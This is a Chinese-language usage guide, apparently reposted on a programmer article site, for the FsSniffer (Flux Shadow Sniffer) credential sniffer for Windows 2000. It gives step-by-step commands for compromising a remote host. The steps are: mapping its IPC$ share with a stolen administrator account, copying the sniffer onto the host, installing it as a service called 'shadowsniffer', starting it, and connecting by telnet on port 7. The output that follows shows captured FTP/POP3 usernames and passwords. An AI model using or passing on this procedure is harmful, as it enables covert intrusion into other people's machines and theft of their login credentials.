流影 POP3/FTP Sniffer 说明
程序员文章站
2022-03-29 16:01:46
FsSniffer只能在Windows 2000中使用,可以捕捉到本机和基于非交换环境局域网的POP3/FTP用户名和密码。一、本地使用FSSNIFFER -S
fssniffer只能在windows 2000中使用,可以捕捉到本机和基于非交换环境局域网的pop3/ftp用户名和密码。一、本地使用fssniffer -s <bind ip> <port> <control password>bind ip:指绑定的ip地址,通常就是本地主机ip地址。port:控制的端口,以后要通过这个端口登陆上去查看结果。control password:登陆时的密码。登陆上去后的命令show result:查看捕获的记录quit:退出shutdown:结束sniffer的运行二、远程使用例如:得到主机211.152.188.1的一个属于管理员组的帐号test:test,首先登录。d:\>net use \\211.152.188.1\ipc$ test /user:testthe command completed successfully.将fssniffer.exe复制到远程主机。(也可以用流光iv中提供的工具“种植者”来做这件事情)d:\>copy "d:\my documents\shadowsniffer\release\fssniffer.exe" \\211.152.188.1\dmin$1 file(s) copied. 利用流光iv中的ntcmd启动fssniffer.exe,并将器安装成为服务=============windows nt/2000 ntcmd ver 0.1 for fluxay iv============written by assassin, http://www.netxeyes.com http://www.netxeyes.orgntcmd>vermicrosoft windows 2000 [version 5.00.2195]ntcmd>fssniffer.exe -i test test shadowsniffer 211.152.188.1 7 123456 flux shadow sniffer(ftp/pop3) edition, written by assassin 2001testsniffer1 installed. ntcmd> 这样在远程主机上面安装了一个服务shadowsniffer。用net命令启动服务ntcmd>net start shadowsnifferthe shadowsniffer service is starting..the shadowsniffer service was started successfully.安装成为服务的格式:fssniffer -i <username> <password> <service name> <bind local ip> <port> <control password>username:远程主机的用户名(必须具有超级用户权限)passwod:远程主机的密码service name:安装的服务名称,如果安装失败,可以将fssniffer.exe改名再试。bind local ip:远程主机的ip。某些主机具有两个ip地址,这是就需要根据需要选择监听的ip地址(例如:局域网和外网)port:远程控制的端口control password:远程控制的密码过一段时间就可以登陆到fssniffer开的端口7上面,查看结果了。d:>telnet 211.152.188.1 7control password: **************===============banyet soft labs. 1995-2001 all rights reserved.========================written by assassin, server edition fluxshadow@21cn.com==================fluxshadow remote ftp/pop3 sniffer beta 1, pleased to see you again!======flux shadow sniffer>show result===========flux shadow sniffer edition results===========211.152.188.112(1106)->211.152.188.1(8213) user zjf211.152.188.112(1106)->211.152.188.1(8213) pass 1qaz4rfv211.152.188.1(8213)->211.152.188.112(1106) user zjf logged in.211.152.188.1(8199)->211.152.188.112(1107) user zjf211.152.188.1(8199)->211.152.188.112(1107) pass 1qaz4rfvtotal 10 sniffered======================================================小榕软件实验室™ 1995-2001版权所有www.netxeyes.com www.netxeyes.orgdansnow@21cn.com